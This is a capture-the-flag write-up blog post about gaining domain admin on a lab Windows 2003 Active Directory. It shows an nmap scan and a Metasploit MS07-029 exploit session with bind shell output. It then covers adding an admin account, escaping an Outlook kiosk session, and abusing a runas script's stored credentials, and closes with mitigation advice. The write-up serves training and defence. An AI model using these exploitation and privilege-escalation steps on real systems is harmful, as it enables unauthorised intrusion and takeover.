Thice.nl

Thice Security

De Star 6, 1601 MH Enkhuizen
Thice Security

Swiss Cyber Storm write-up 1: CarGame Challenge 4

24/05/2011, by Thice, category CTF

This article is a write-up of the Swiss Cyber Storm CarGame Challenge 4 (February 2011). For more info on the Swiss Cyber Storm Conference please check my post about the conference here.

I only joined the CarGame in level 4, which meant I could not qualify any more to play the CarGame challenge during the conference. However since the challenges seemed fun I did the last two CarGame challenges anyway. The number and title of this challenge were:

  • 7031 Gain Windows Domain Admin Privileges

I submitted my solution and it was accepted by the organisation, however I do not know if this was the solution the organisation expected and if any other participants have other solutions.

Challenge Description

Taken from the Hacking-Lab website:

We provide a Microsoft Windows 2003 Active Directory infrastructure consisting of a terminal server (csl-ts.compa.ny) and the Active Directory (csl-ad.compa.ny) itself. You also have a standard user account in the directory. Please use one of the following user accounts

You have a valid, unprivileged AD user in this wargame.
UserID: hacker10 or hacker11 or hacker12 or … until hacker30

Domain: COMPA

Password: compass
NOTE: You might be logged off in case other users use the same user name.

OpenVPN connection is required to solve this wargame (dns resolution, availability of the microsoft servers)

 

Swiss Cyberstorm write up Car Game 4 - 1

 

Goal of this Challenge

  • Gain Enterprise Domain Admin Privileges on the provided Microsoft Active Directory infrastructure. Proof you were there. Write your hack verbose journal and attach it to your solution submission.

 

Wargame Questions

Please use the SendSolution button within the Hacking-Lab to send your solution. We can’t accept e-mail solutions – Sorry. Please send the following information

  1. How you were able to gain the Enterprise Domain Admin Privileges
  2. How to mitigate the risk
  3. Please attach Screenshots with your solution (proof)

 

Hacking csl-ad.compa.ny

After performing a NMAP scan on the csl-ad.compa.ny host it shows that the system has quite some open ports. The output of the NMAP scan is shown below.

 

Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds
[email protected]:~$ nmap csl-ad.compa.ny

Starting Nmap 5.00 ( http://nmap.org ) at 2011-02-25 23:49 CET
Interesting ports on 192.168.200.64:
Not shown: 984 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1039/tcp open  unknown
1047/tcp open  unknown
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds

 

One of the open ports on the system is the RDP (Remote Desktop Protocol) port, when connecting to this port by using the Linux rdesktop program we can see that the server is running Microsoft Windows 2003.

The amount of exploits available for Microsoft Windows 2003 is not that high, one particular exploit that is available targeting both Windows 2003 SP0 and SP1 is the exploit for MS07-029, more information on this exploit can be found on the Metasploit module website for this exploit:

http://www.metasploit.com/modules/exploit/windows/dcerpc/ms07_029_msdns_zonename

The exploit for this vulnerability can be found and executed using the Metasploit framework, the specific Metasploit module (windows/dcerpc/ms07_029_msdns_zonename) and its options can be seen below.

 

[email protected]:~# msfconsole

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 648 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11895 updated today (2011.03.08)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set rhost csl-ad.compa.ny
rhost => csl-ad.compa.ny
msf exploit(ms07_029_msdns_zonename) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp

msf exploit(ms07_029_msdns_zonename) > show options

Module options (exploit/windows/dcerpc/ms07_029_msdns_zonename):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST   csl-ad.compa.ny  yes       The target address
   RPORT   0                yes       The target port

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LPORT     4444             yes       The listen port
   RHOST     csl-ad.compa.ny  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

 

After setting all the options in the module the exploit is ready to be executed. The output of this exploit is shown below.

 

msf exploit(ms07_029_msdns_zonename) > exploit

[*] Connecting to the endpoint mapper service...
[*] Started bind handler
[*] Discovered Microsoft DNS Server RPC service on port 1047
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_ip_tcp:csl-ad.compa.ny[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_ip_tcp:csl-ad.compa.ny[0] ...
[*] Sending exploit...
[*] Sending stage (240 bytes) to csl-ad.compa.ny
[*] Command shell session 1 opened (10.201.0.22:41264 -> 192.168.200.64:4444) at Tue Mar 08 08:01:52 -0500 2011
[-] Error: no response from dcerpc service

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

 

The exploit against csl-ad.compa.ny was successful and launched a remote shell (using the payload windows/shell/bind_tcp). Using the ipconfig command we can see that we are indeed on csl-ad.compa.ny (which uses IP 192.168.200.64) and using the whoami command we can see we currently are logged in with the user system. The output of these commands is shown below.

 

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.200.64
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.200.204

C:\WINDOWS\system32>whoami
whoami
nt authority\system

 

Since we are the system user we can use our privileges to create a new local admin account, the commands and output used for that can be shown below.

 

C:\WINDOWS\system32>net user hawkje password /add /domain
net user hawkje password /add /domain
The command completed successfully.

C:\WINDOWS\system32>net localgroup Administrators /add hawkje
net localgroup Administrators /add hawkje
The command completed successfully.

 

We now have a local admin user which we can use to remotely log in to the system, to do this we use the Linux program rdesktop.

 

rdesktop csl-ad.compa.ny

 

The login and password that we will use are of the account we just created.

The screenshot below shows us being logged in as user ‘hawkje’ which has admin privileges. These admin privileges can be checked by using the net localgroup administrators command.

 


Swiss Cyberstorm write up Car Game 4 - 2

 

When opening the Active Directory settings we can find our account between the users. Here we can easily add our account to the Domain Admins group. The membership properties screen can be seen below.

 

Swiss Cyberstorm write up Car Game 4 - 3

 

Alternative exploit

Besides the previously used windows/dcerpc/ms07_029_msdns_zonename Metasploit module the same vulnerability (MS09-27) can also be exploited by using an alternative exploit. This alternative exploit is the Metasploit module windows/smb/ms07_029_msdns_zonename, the configuration and the output of this module can be seen below.

 

msf exploit(ms03_026_dcom) > use windows/smb/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > show options

Module options (exploit/windows/smb/ms07_029_msdns_zonename):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST                    yes       The target address
   RPORT   445              yes       Set the SMB service port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(ms07_029_msdns_zonename) > set RHOST csl-ad.compa.ny
RHOST => csl-ad.compa.ny
msf exploit(ms07_029_msdns_zonename) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms07_029_msdns_zonename) > set SMBUSER hacker14
SMBUSER => hacker14
msf exploit(ms07_029_msdns_zonename) > set SMBPASS compass
SMBPASS => compass
msf exploit(ms07_029_msdns_zonename) > exploit

[*] Started bind handler
[*] Detected a Windows 2003 SP1 target...
[*] Trying target Windows 2003 Server SP1-SP2 English...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_np:csl-ad.compa.ny[\dnsserver] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:[email protected]_np:csl-ad.compa.ny[\dnsserver] ...
[*] Sending exploit...
[*] Sending stage (240 bytes) to csl-ad.compa.ny
[*] Command shell session 2 opened (10.201.0.22:40045 -> 192.168.200.64:4444) at Tue Mar 08 08:33:02 -0500 2011
[-] Error: no response from dcerpc service

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.200.64
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.200.204

C:\WINDOWS\system32>whoami
whoami
nt authority\system

 

Hacking csl-ts.compa.ny

The csl-ts.compa.ny system does not need to be exploited to gain administrator access to the csl-ad.compa.ny system, and thus could be seen as being out of scope for this challenge. However, since the system is part of this exercise I decided to exploit it as well, in a totally different way than the csl-ad.compa.ny system.

As part of the challenge we received a set of user accounts. These user accounts can be used to log in to the csl-ts.compa.ny terminal server. The user account that will be used is the account hacker14 with password compass.

To connect to the csl-ts.compa.ny server we will use the Linux rdesktop program, the command to start this program is shown below and it will open a RDP session to the system.

 

rdesktop csl-ts.compa.ny

 

When the RDP session is opened on the csl-ts.compa.ny system we notice that we are not getting a normal Windows session, we only get a session with Outlook 2003. This means that we should break out of this Outlook 2003 session.

One way to break out of this session is to launch explorer.exe, this can be accomplished by getting a “Open” dialog screen in Windows. From Outlook this can for example be done by going to:

  • File –> Open –> Outlook Data File

This action is shown on the screenshot below.

 

Swiss Cyberstorm write up Car Game 4 - 4

 

In the “Open Outlook Data File” dialog screen we can browse to the Windows directory (C:\Windows\) and when we select “All Files (*.*)” as “Files of type:”, explorer.exe will show up. When we right click explorer.exe we can choose “Open” to execute it.

 


Swiss Cyberstorm write up Car Game 4 - 5

 

After executing explorer.exe a script can be seen that will pop up, this script can be found in the start menu as shown in the next screenshot.

 

Swiss Cyberstorm write up Car Game 4 - 6

 

The script name is init_script.bat and it contains the following command:

 

C:\Scripts\lsrunase.exe /user:runbatch /password:/kh5nOVO/bbbjbP4XMVGkWm1e5WKzj71Aeg= /domain:CSL-TS
/command:do_stuff.bat /runpath:C:\Scripts\

 

The script seems to run the lsrunase.exe program and uses the runbatch account to do so. This runbatch account is part of the local administrators group as can be seen below after executing the net localgroup administrators command.

 

C:\Documents and Settings\hacker14>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
COMPA\Domain Admins
hackmin
ibuetler
runbatch
stefan
The command completed successfully.

 

The command in the init_script.bat file can easily be adjusted to execute other commands, which means we can execute commands as the runbatch user. Since the runbatch user is a local admin account we can execute commands as a local admin. The easiest command to execute is cmd.exe to get access to a local admin command shell. The cmd.exe command can be executed with the following adjustment to the init_script.bat.

 

C:\Scripts\lsrunase.exe /user:runbatch /password:/kh5nOVO/bbbjbP4XMVGkWm1e5WKzj71Aeg= /domain:CSL-TS
/command:cmd.exe /runpath:C:\Scripts\

 

After executing this command from a cmd.exe command shell a new command shell will open with the runbatch (and thus local admin) rights. This command shell can then be abused to add a new local admin user. These actions can be seen in the screenshot below.

 

Swiss Cyberstorm write up Car Game 4 - 7

 

Mitigating the risk

To mitigate the risk I would propose the following actions to be taken on both of the systems:

  • Install the latest software and security updates from Microsoft.
  • Disable any unneeded services.
  • Activate a firewall on both of the systems or place both systems behind a hardware firewall. The firewall should block all traffic except the traffic that is needed for operational use, only traffic from legitimate systems should be allowed.
  • Install and maintain an Antivirus solution.
  • Disable and remove the init_script.bat script running on the csl-ts.compa.ny system.
  • Disable the execution of explorer.exe on the csl-ts.compa.ny system. Or enable Outlook Web Access (OWA) instead of the current Outlook 2003 sessions.
  • Remove any unnecessary data from the systems, including the currently present old password dump files and exploit files.

2 Comments

So, what do you think ?